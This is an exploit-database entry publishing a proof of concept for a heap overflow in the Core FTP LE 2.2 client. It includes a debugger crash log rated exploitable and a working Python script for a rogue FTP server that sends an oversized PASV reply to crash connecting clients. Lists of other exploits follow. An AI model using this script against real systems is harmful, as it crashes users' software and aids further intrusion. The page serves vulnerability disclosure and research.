Menu

Search for hundreds of thousands of exploits

"Core FTP LE 2.2 - Heap Overflow (PoC)"

Author

Exploit author

"Gabor Seljan"

Platform

Exploit platform

windows

Release date

Exploit published date

2014-06-11

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
#-----------------------------------------------------------------------------#
# Exploit Title: Core FTP LE 2.2 - Heap Overflow PoC                          #
# Date: Jun 11 2014                                                           #
# Exploit Author: Gabor Seljan                                                #
# Software Link: http://www.coreftp.com/                                      #
# Version: 2.2 build 1798                                                     #
# Tested on: Windows XP SP3                                                   #
#-----------------------------------------------------------------------------#

# In some cases the client does not do proper bounds checking on server
# responses. An overly long reply from the server causes a heap overflow and
# crashes the application. The USER, PASS, PASV, SYST, PWD, CDUP commands are
# all vulnerable and possibly other commands are too.

'''
HEAP[coreftp.exe]: Heap block at 00F17BC8 modified at 00F1BBD1 past requested size of 4001
(9d8.9f4): Break instruction exception - code 80000003 (first chance)
eax=00f17bc8 ebx=00f1bbd1 ecx=7c91eab5 edx=015295ab esi=00f17bc8 edi=00004001
eip=7c90120e esp=015297ac ebp=015297b0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc              int     3
0:002> dd eax
00f17bc8  004b0804 011f0733 20373232 41414141
00f17bd8  41414141 41414141 41414141 41414141
00f17be8  41414141 41414141 41414141 41414141
00f17bf8  41414141 41414141 41414141 41414141
00f17c08  41414141 41414141 41414141 41414141
00f17c18  41414141 41414141 41414141 41414141
00f17c28  41414141 41414141 41414141 41414141
00f17c38  41414141 41414141 41414141 41414141
0:002> g
HEAP[coreftp.exe]: Invalid Address specified to RtlFreeHeap( 00C10000, 00F17BD0 )
(9d8.9f4): Break instruction exception - code 80000003 (first chance)
eax=00f17bc8 ebx=00f17bc8 ecx=7c91eab5 edx=015295ba esi=00c10000 edi=00f17bc8
eip=7c90120e esp=015297c4 ebp=015297c8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc              int     3
0:002> g
(9d8.9f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00f3bff0 ebx=00000000 ecx=41414141 edx=00f1bbf0 esi=00f3bfe8 edi=00c10000
eip=7c9276dc esp=01529704 ebp=015297d8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlOemStringToUnicodeString+0x277:
7c9276dc 8901            mov     dword ptr [ecx],eax  ds:0023:41414141=????????
0:002> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlOemStringToUnicodeString+0x0000000000000277 (Hash=0x72683756.0x417d7f55)

User mode write access violations that are not near NULL are exploitable.
(b58.cf0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00f1bbf0 ebx=41414141 ecx=00004141 edx=00c10608 esi=00f1bbe8 edi=41414141
eip=7c919064 esp=0152d30c ebp=0152d528 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
ntdll!RtlDosSearchPath_Ustr+0x473:
7c919064 8b0b            mov     ecx,dword ptr [ebx]  ds:0023:41414141=????????
0:002> dd eax
00f1bbf0  41414141 41414141 41414141 41414141
00f1bc00  41414141 41414141 41414141 41414141
00f1bc10  41414141 41414141 41414141 41414141
00f1bc20  41414141 41414141 41414141 41414141
00f1bc30  41414141 41414141 41414141 41414141
00f1bc40  41414141 41414141 41414141 41414141
00f1bc50  41414141 41414141 41414141 41414141
00f1bc60  41414141 41414141 41414141 41414141
0:002> dd esi
00f1bbe8  41414141 41414141 41414141 41414141
00f1bbf8  41414141 41414141 41414141 41414141
00f1bc08  41414141 41414141 41414141 41414141
00f1bc18  41414141 41414141 41414141 41414141
00f1bc28  41414141 41414141 41414141 41414141
00f1bc38  41414141 41414141 41414141 41414141
00f1bc48  41414141 41414141 41414141 41414141
00f1bc58  41414141 41414141 41414141 41414141
'''

#!/usr/bin/python

from socket import *

host = "0.0.0.0"
port = 21
payload = "A" * 150000

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, 21))
s.listen(1)

print "[+] Evil FTP Server started"
print "[+] Listening on port %d..." % port

conn, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
conn.send("220 Welcome to Evil FTP Server\r\n")
conn.recv(1024)  # Receive USER
conn.send("331 Need password for whatever user\r\n")
conn.recv(1024)  # Receive PASS
conn.send("230 User logged in\r\n")
conn.recv(1024)  # Receive SYST
conn.send("215 UNIX Type: L8\r\n")
conn.recv(1024)  # Receive PWD
conn.send("257 \"/\" is current directory\r\n")

try:
  print "[+] Sending evil response for 'PASV' command..."
  conn.recv(1024)  # Receive PASV
  conn.send("227 "+payload+"\r\n")
  conn.recv(1024)
except error as e:
  if e.errno == 10054:
    print "[+] Client crashed!"
  else:
    print e
finally:
  conn.close()
  s.close()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2019-12-11 "AppXSvc 17763 - Arbitrary File Overwrite (DoS)" dos windows "Gabor Seljan"
2019-09-16 "AppXSvc - Privilege Escalation" local windows "Gabor Seljan"
2015-05-18 "BulletProof FTP Client 2010 - Local Buffer Overflow (DEP Bypass)" local windows "Gabor Seljan"
2014-07-24 "BulletProof FTP Client 2010 - Buffer Overflow (SEH) (PoC)" dos windows "Gabor Seljan"
2014-06-11 "Core FTP LE 2.2 - Heap Overflow (PoC)" dos windows "Gabor Seljan"
2014-03-25 "Haihaisoft HUPlayer 1.0.4.8 - '.m3u' / '.pls' / '.asx' Buffer Overflow (SEH)" dos windows "Gabor Seljan"
2014-03-25 "Haihaisoft Universal Player 1.5.8 - '.m3u' / '.pls '/ '.asx' Buffer Overflow (SEH)" dos windows "Gabor Seljan"
2014-03-03 "ALLPlayer 5.8.1 - '.m3u' Local Buffer Overflow (SEH)" local windows "Gabor Seljan"
2014-02-26 "Gold MP4 Player 3.3 - Buffer Overflow (PoC) (SEH)" dos windows "Gabor Seljan"
2014-02-26 "Music AlarmClock 2.1.0 - '.m3u' Crash (PoC)" dos windows "Gabor Seljan"
2013-12-24 "RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow" local windows "Gabor Seljan" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected